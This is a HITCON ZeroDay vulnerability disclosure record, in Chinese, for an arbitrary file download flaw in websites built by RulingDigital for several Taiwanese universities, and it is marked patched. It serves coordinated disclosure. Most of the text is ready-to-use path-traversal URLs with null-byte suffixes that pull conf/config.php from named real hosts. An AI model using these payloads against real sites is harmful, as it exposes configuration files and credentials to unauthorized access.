Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2025-00041
- 發信 Vendor: TACERT台灣學術網路危機處理中心
- Title: RulingDigital 銳綸數位 所設計多所學校或單位網站 任意檔案下載
- Introduction: 任意檔案下載
處理狀態
目前狀態
-
新提交
-
已審核
-
已通報
-
已修補
-
未複測
-
公開
處理歷程
- 2025/01/08 22:55:11 : 新提交 (由 萌新 更新此狀態)
- 2025/01/10 13:42:17 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2025/01/17 12:59:47 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2025/01/17 12:59:47 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2025/03/24 03:04:51 : 公開 (由 HITCON ZeroDay 平台自動更新)
- 2025/04/01 15:50:46 : 已修補 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2025/04/01 15:56:39 : 已修補 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2025/04/09 03:00:06 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2025-00041
- 通報者:nhd1261 (萌新)
- 風險:高
- 類型:任意檔案下載 (Arbitrary File Download)
參考資料
OWASP Top 10 - 2017 A5 - Broken Access Control
https://www.owasp.org/index.php/Top_10-2017_A5-Broken_Access_Control
OWASP Top 10 - 2013 A4 - Insecure Direct Object References
https://www.owasp.org/index.php/Top_10_2013-A4-Insecure_Direct_Object_References
CWE-284: Improper Access Control
https://cwe.mitre.org/data/definitions/284.html
OWASP - Path Traversal 及防禦方式
https://www.owasp.org/index.php/Path_Traversal
CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
https://cwe.mitre.org/data/definitions/22.html
相關網址
https://ord.nccu.edu.tw/img.php?img=conf/config.php%00.txt&dir=../
淡江大學 校務研究中心
http://ir.tku.edu.tw/img.php?img=conf/config.php%00.txt&dir=../
淡江大學 理學院尖端材料科學學士學位學程
http://www.ams.tku.edu.tw/img.php?img=conf/config.php%00.txt&dir=../
中華民國合作事業協會
http://clc-coop.tw/img.php?img=conf/config.php.txt&dir=../
中山大學 外國語文學系
http://www.zephyr.nsysu.edu.tw/img.php?img=conf/config.php%00.txt&dir=../
中央大學 水文與海洋科學研究所
https://www.ihs.ncu.edu.tw/download.php?filename=download.php%00.txt&dir=../&title=download
http://www.ihs.ncu.edu.tw/img.php?img=conf/config.php%00.txt&dir=../
南開科技大學 人事室
https://pcx.nkut.edu.tw/img.php?img=conf/config.php%00.txt&dir=../
臺灣師範大學 資訊工程學系
http://w1.csie.ntnu.edu.tw/img.php?img=conf/config.php%00.txt&dir=..//
東海大學 法律學院研究中心
https://rccl.thu.edu.tw/img.php?img=conf/config.php&dir=../
敘述
根據ZD-2025-00035所發現漏洞,尋找RulingDigital 銳綸數位所設計網站,發現幾乎都有相同漏洞,只是因各單位伺服器安全機制不同而有所差異,有些已增設防火牆或安全設置,但仍有不少網站有任意檔案下載漏洞,。
政治大學 研發處
https://ord.nccu.edu.tw/img.php?img=conf/config.php%00.txt&dir=../
淡江大學 校務研究中心
http://ir.tku.edu.tw/img.php?img=conf/config.php%00.txt&dir=../
淡江大學 理學院尖端材料科學學士學位學程
http://www.ams.tku.edu.tw/img.php?img=conf/config.php%00.txt&dir=../
中華民國合作事業協會
http://clc-coop.tw/img.php?img=conf/config.php.txt&dir=../
中山大學 外國語文學系
http://www.zephyr.nsysu.edu.tw/img.php?img=conf/config.php%00.txt&dir=../
中央大學 水文與海洋科學研究所
https://www.ihs.ncu.edu.tw/download.php?filename=download.php%00.txt&dir=../&title=download
http://www.ihs.ncu.edu.tw/img.php?img=conf/config.php%00.txt&dir=../
南開科技大學 人事室
https://pcx.nkut.edu.tw/img.php?img=conf/config.php%00.txt&dir=../
臺灣師範大學 資訊工程學系
http://w1.csie.ntnu.edu.tw/img.php?img=conf/config.php%00.txt&dir=..//
東海大學 法律學院研究中心
https://rccl.thu.edu.tw/img.php?img=conf/config.php&dir=../